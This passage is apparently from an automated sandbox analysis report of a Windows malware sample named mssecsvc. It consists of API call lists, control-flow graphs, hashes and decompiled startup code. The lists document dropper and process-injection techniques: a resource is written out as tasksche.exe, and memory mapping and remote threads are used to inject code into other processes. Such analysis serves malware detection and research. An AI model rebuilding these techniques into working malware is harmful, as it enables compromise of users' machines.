				}
				return 0;
			}






















                                                                                                                                                0x00407cf5
                                                                                                                                                0x00407cfb
                                                                                                                                                0x00407d15
                                                                                                                                                0x00407d22
                                                                                                                                                0x00407d2f
                                                                                                                                                0x00407d34
                                                                                                                                                0x00407d3c
                                                                                                                                                0x00407d43
                                                                                                                                                0x00407d49
                                                                                                                                                0x00407d4f
                                                                                                                                                0x00407d55
                                                                                                                                                0x00407d5b
                                                                                                                                                0x00407d7a
                                                                                                                                                0x00407d7e
                                                                                                                                                0x00407d86
                                                                                                                                                0x00407d8e
                                                                                                                                                0x00407d95
                                                                                                                                                0x00407d9d
                                                                                                                                                0x00407da1
                                                                                                                                                0x00407daf
                                                                                                                                                0x00407db3
                                                                                                                                                0x00407dc4
                                                                                                                                                0x00407dc8
                                                                                                                                                0x00407dca
                                                                                                                                                0x00407dcc
                                                                                                                                                0x00407ddb
                                                                                                                                                0x00407de2
                                                                                                                                                0x00407def
                                                                                                                                                0x00407df1
                                                                                                                                                0x00407e01
                                                                                                                                                0x00407e18
                                                                                                                                                0x00407e2c
                                                                                                                                                0x00407e43
                                                                                                                                                0x00407e49
                                                                                                                                                0x00407e4e
                                                                                                                                                0x00407e61
                                                                                                                                                0x00407e68
                                                                                                                                                0x00407e72
                                                                                                                                                0x00407e7a
                                                                                                                                                0x00407e82
                                                                                                                                                0x00407e8b
                                                                                                                                                0x00407e95
                                                                                                                                                0x00407e9b
                                                                                                                                                0x00407e9f
                                                                                                                                                0x00407ea8
                                                                                                                                                0x00407eb0
                                                                                                                                                0x00407ebc
                                                                                                                                                0x00407ed3
                                                                                                                                                0x00407edb
                                                                                                                                                0x00407ee0
                                                                                                                                                0x00407ee8
                                                                                                                                                0x00407ef0
                                                                                                                                                0x00407ef7
                                                                                                                                                0x00407f02
                                                                                                                                                0x00407f02
                                                                                                                                                0x00407ef0
                                                                                                                                                0x00407e4e
                                                                                                                                                0x00407db3
                                                                                                                                                0x00407da1
                                                                                                                                                0x00407d8e
                                                                                                                                                0x00407d7e
                                                                                                                                                0x00407d5b
                                                                                                                                                0x00407d4f
                                                                                                                                                0x00407d43
                                                                                                                                                0x00407f14

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F61FB10,?,00000000), ref: 00407CEF
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                                                                                                                • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                                                                                                                • sprintf.MSVCRT ref: 00407E01
                                                                                                                                                • sprintf.MSVCRT ref: 00407E18
                                                                                                                                                • MoveFileExA.KERNEL32 ref: 00407E2C
                                                                                                                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                                                                                                                                                • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407E68
                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00407EE8
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                                                                                                                                                • CloseHandle.KERNEL32(08000000), ref: 00407F02
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleProcResource$CloseFile$Createsprintf$FindLoadLockModuleMoveProcessSizeofWrite
                                                                                                                                                • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                                                                                                                • API String ID: 4281112323-1507730452
                                                                                                                                                • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                                                                                • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                                                                                                                • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                                                                                • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 13 ac042d-ac04a4 call ac10ce 16 ac04dd 13->16 17 ac04a6-ac04db call ac273c GetModuleHandleA 13->17 19 ac04e4-ac0509 call ac2750 GetVersion 16->19 17->19 23 ac050f-ac0530 VirtualAlloc 19->23 24 ac05ca-ac05d1 19->24 25 ac05a9-ac05b3 FindCloseChangeNotification 23->25 26 ac0532-ac0562 call ac0305 23->26 24->25 27 ac05d3-ac05fc SetProcessAffinityMask call ac05f2 24->27 25->24 26->25 38 ac0564-ac057b 26->38 32 ac05fe-ac061c 27->32 33 ac0621-ac0623 27->33 32->33 35 ac064c-ac0652 33->35 36 ac0625-ac0630 33->36 35->25 37 ac0658-ac0671 35->37 39 ac0639-ac0648 36->39 40 ac0632 36->40 37->25 41 ac0677-ac0690 37->41 38->25 46 ac057d-ac05a4 call ac05ba 38->46 39->35 40->39 41->25 42 ac0696-ac069c 41->42 44 ac069e-ac06b1 42->44 45 ac06d8-ac06de 42->45 44->25 47 ac06b7-ac06bd 44->47 48 ac06fc-ac0715 lstrcpyW call ac24ae 45->48 49 ac06e0-ac06f3 45->49 46->25 47->45 51 ac06bf-ac06d2 47->51 56 ac074c-ac0775 NtMapViewOfSection 48->56 57 ac0717-ac0746 GetPEB lstrcpyW lstrcatW call ac24ae 48->57 49->48 52 ac06f5 49->52 51->25 51->45 52->48 56->25 58 ac077b-ac078f call ac0305 NtOpenProcessToken 56->58 57->25 57->56 64 ac07c5-ac07e4 CreateToolhelp32Snapshot Process32First 58->64 65 ac0791-ac07a3 call ac115d call ac07ac 58->65 67 ac07eb-ac07f5 Process32Next 64->67 76 ac080e-ac080f 65->76 77 ac07a5 65->77 69 ac0865-ac0872 FindCloseChangeNotification 67->69 70 ac07f7-ac07fb 67->70 69->25 70->67 72 ac07fd-ac080d OpenProcess 70->72 72->67 74 ac080f 72->74 75 ac0810-ac0818 call ac2574 74->75 82 ac085c-ac0863 FindCloseChangeNotification 75->82 83 ac081a-ac0820 75->83 76->75 77->75 79 ac07a7-ac07e4 CreateToolhelp32Snapshot Process32First 77->79 79->67 82->67 83->82 84 ac0822-ac0832 83->84 84->82 85 ac0834-ac084b CreateRemoteThread 84->85 85->82 86 ac084d-ac0857 call ac05ba 85->86 86->82
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00AC04BE
                                                                                                                                                • GetVersion.KERNEL32 ref: 00AC0500
                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00AC0528
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AC05AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocChangeCloseFindHandleModuleNotificationVersionVirtual
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt$\BaseNamedObjects\axytVt$csrs
                                                                                                                                                • API String ID: 2920002527-8628898
                                                                                                                                                • Opcode ID: 5e26fa20f83f5e6203321ab9e5c6cfdbb76e6a20a0cc65ba3ebce16670a95049
                                                                                                                                                • Instruction ID: c9976dfedfb1afd437706d3be4c87a3e70cf6d6c5a0f9f16f252109be06c3263
                                                                                                                                                • Opcode Fuzzy Hash: 5e26fa20f83f5e6203321ab9e5c6cfdbb76e6a20a0cc65ba3ebce16670a95049
                                                                                                                                                • Instruction Fuzzy Hash: ECB1A771605249FFEB259F24C80AFAA3BA9EF45710F12412CF9099E181C7F09F958B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC05F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 88 ac05f2-ac0615 GetModuleHandleA call ac10ce 91 ac05a9-ac05b3 FindCloseChangeNotification 88->91 92 ac0617-ac0630 88->92 96 ac05ca-ac05d1 91->96 93 ac0639-ac0648 92->93 94 ac0632 92->94 95 ac064c-ac0652 93->95 94->93 95->91 97 ac0658-ac0671 95->97 96->91 98 ac05d3-ac05fc SetProcessAffinityMask call ac05f2 96->98 97->91 99 ac0677-ac0690 97->99 105 ac05fe-ac061c 98->105 106 ac0621-ac0623 98->106 99->91 101 ac0696-ac069c 99->101 103 ac069e-ac06b1 101->103 104 ac06d8-ac06de 101->104 103->91 107 ac06b7-ac06bd 103->107 108 ac06fc-ac0715 lstrcpyW call ac24ae 104->108 109 ac06e0-ac06f3 104->109 105->106 106->95 110 ac0625-ac0630 106->110 107->104 111 ac06bf-ac06d2 107->111 115 ac074c-ac0775 NtMapViewOfSection 108->115 116 ac0717-ac0746 GetPEB lstrcpyW lstrcatW call ac24ae 108->116 109->108 112 ac06f5 109->112 110->93 110->94 111->91 111->104 112->108 115->91 117 ac077b-ac078f call ac0305 NtOpenProcessToken 115->117 116->91 116->115 122 ac07c5-ac07e4 CreateToolhelp32Snapshot Process32First 117->122 123 ac0791-ac07a3 call ac115d call ac07ac 117->123 125 ac07eb-ac07f5 Process32Next 122->125 134 ac080e-ac080f 123->134 135 ac07a5 123->135 127 ac0865-ac0872 FindCloseChangeNotification 125->127 128 ac07f7-ac07fb 125->128 127->91 128->125 130 ac07fd-ac080d OpenProcess 128->130 130->125 132 ac080f 130->132 133 ac0810-ac0818 call ac2574 132->133 140 ac085c-ac0863 FindCloseChangeNotification 133->140 141 ac081a-ac0820 133->141 134->133 135->133 137 ac07a7-ac07e4 CreateToolhelp32Snapshot Process32First 135->137 137->125 140->125 141->140 142 ac0822-ac0832 141->142 142->140 143 ac0834-ac084b CreateRemoteThread 142->143 143->140 144 ac084d-ac0857 call ac05ba 143->144 144->140
                                                                                                                                                APIs
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AC05AD
                                                                                                                                                • GetModuleHandleA.KERNEL32(00AC05EC), ref: 00AC05F2
                                                                                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\axytVt,\BaseNamedObjects\axytVt), ref: 00AC070A
                                                                                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\axytVt,?), ref: 00AC072D
                                                                                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\axytVt,\axytVt), ref: 00AC073B
                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00AC076B
                                                                                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00AC0786
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AC07C9
                                                                                                                                                • Process32First.KERNEL32 ref: 00AC07DC
                                                                                                                                                • Process32Next.KERNEL32 ref: 00AC07ED
                                                                                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC0805
                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00AC0842
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC085D
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00AC086C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChangeCloseFindNotification$CreateOpenProcessProcess32lstrcpy$FirstHandleModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt$\BaseNamedObjects\axytVt$csrs
                                                                                                                                                • API String ID: 3804105423-8628898
                                                                                                                                                • Opcode ID: 587852de3d39a4d695cdbfc1c95892cdb4d54edcd7c040a1b51e64314113049a
                                                                                                                                                • Instruction ID: 610f2c599af7f5930dec5f1ded713f148c7349b5d241dd5c5161f330a18b3d1f
                                                                                                                                                • Opcode Fuzzy Hash: 587852de3d39a4d695cdbfc1c95892cdb4d54edcd7c040a1b51e64314113049a
                                                                                                                                                • Instruction Fuzzy Hash: A3719972604209FFEB259F10C84AFAE3B6DEF45311F12402CE909AE0D1C7B59F459B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 250 ac252f-ac2573 NtOpenSection
                                                                                                                                                APIs
                                                                                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 00AC255E
                                                                                                                                                Strings
                                                                                                                                                • \BaseNamedObjects\axytVt, xrefs: 00AC254B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: OpenSection
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt
                                                                                                                                                • API String ID: 1950954290-2943719413
                                                                                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC2574 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 251 ac2574-ac257c call ac252f 254 ac2661-ac2664 251->254 255 ac2582-ac25b4 NtMapViewOfSection FindCloseChangeNotification 251->255 255->254 256 ac25ba-ac25c0 255->256 257 ac25ce-ac25d8 256->257 258 ac25c2-ac25cb 256->258 259 ac25ef-ac262a call ac2477 * 3 257->259 260 ac25da-ac25e2 257->260 258->257 269 ac262c-ac2632 call ac2477 259->269 270 ac2637-ac263f 259->270 260->259 262 ac25e4-ac25ea call ac2477 260->262 262->259 269->270 272 ac264c-ac2654 270->272 273 ac2641-ac2647 call ac2477 270->273 272->254 275 ac2656-ac265c call ac2477 272->275 273->272 275->254
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00AC252F: NtOpenSection.NTDLL(?,0000000E), ref: 00AC255E
                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00AC25A4
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00AC0815), ref: 00AC25AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Section$ChangeCloseFindNotificationOpenView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1694706092-0
                                                                                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                                                                                • Instruction ID: 29aab9b1342b60392af6199293618f237a779856f747a9fba381fffd22353668
                                                                                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                                                                                • Instruction Fuzzy Hash: 5E211870300646BBEB28DF25CD56FAA7369EF80B44F41011CF8198E194DBB6AE24C728
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC1422 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 277 ac1422-ac1474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                                                                                APIs
                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00AC145A
                                                                                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00AC146A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3615134276-0
                                                                                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC2477 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 278 ac2477-ac24ad NtProtectVirtualMemory NtWriteVirtualMemory
                                                                                                                                                APIs
                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00AC249B
                                                                                                                                                • NtWriteVirtualMemory.NTDLL ref: 00AC24A4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 151266762-0
                                                                                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC144A Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 279 ac144a-ac1474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                                                                                APIs
                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00AC145A
                                                                                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00AC146A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3615134276-0
                                                                                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 146 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 149 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 146->149 150 409a8d-409a98 __setusermatherr 146->150 153 409af2-409afa 149->153 154 409b2c-409b2f 149->154 150->149 155 409b00-409b03 153->155 156 409afc-409afe 153->156 157 409b31-409b35 154->157 158 409b09-409b0d 154->158 155->158 159 409b05-409b06 155->159 156->153 156->155 157->154 160 409b13-409b24 GetStartupInfoA 158->160 161 409b0f-409b11 158->161 159->158 162 409b26-409b2a 160->162 163 409b37-409b39 160->163 161->159 161->160 164 409b3a-409b45 GetModuleHandleA call 408140 162->164 163->164 166 409b4a-409b67 exit _XcptFilter 164->166
                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                                                                                                                                                0x00409a19
                                                                                                                                                0x00409a1b
                                                                                                                                                0x00409a20
                                                                                                                                                0x00409a2b
                                                                                                                                                0x00409a2c
                                                                                                                                                0x00409a39
                                                                                                                                                0x00409a3e
                                                                                                                                                0x00409a43
                                                                                                                                                0x00409a4a
                                                                                                                                                0x00409a51
                                                                                                                                                0x00409a64
                                                                                                                                                0x00409a72
                                                                                                                                                0x00409a7b
                                                                                                                                                0x00409a80
                                                                                                                                                0x00409a85
                                                                                                                                                0x00409a8b
                                                                                                                                                0x00409a92
                                                                                                                                                0x00409a98
                                                                                                                                                0x00409a99
                                                                                                                                                0x00409a9e
                                                                                                                                                0x00409aa3
                                                                                                                                                0x00409aa8
                                                                                                                                                0x00409ab2
                                                                                                                                                0x00409acb
                                                                                                                                                0x00409ad1
                                                                                                                                                0x00409ad6
                                                                                                                                                0x00409adb
                                                                                                                                                0x00409ae8
                                                                                                                                                0x00409aea
                                                                                                                                                0x00409af0
                                                                                                                                                0x00409b2c
                                                                                                                                                0x00409b31
                                                                                                                                                0x00409b32
                                                                                                                                                0x00409b32
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af3
                                                                                                                                                0x00409af6
                                                                                                                                                0x00409af8
                                                                                                                                                0x00409b03
                                                                                                                                                0x00409b05
                                                                                                                                                0x00409b05
                                                                                                                                                0x00409b06
                                                                                                                                                0x00409b06
                                                                                                                                                0x00409b03
                                                                                                                                                0x00409b09
                                                                                                                                                0x00409b0d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00409b13
                                                                                                                                                0x00409b1a
                                                                                                                                                0x00409b24
                                                                                                                                                0x00409b39
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b3a
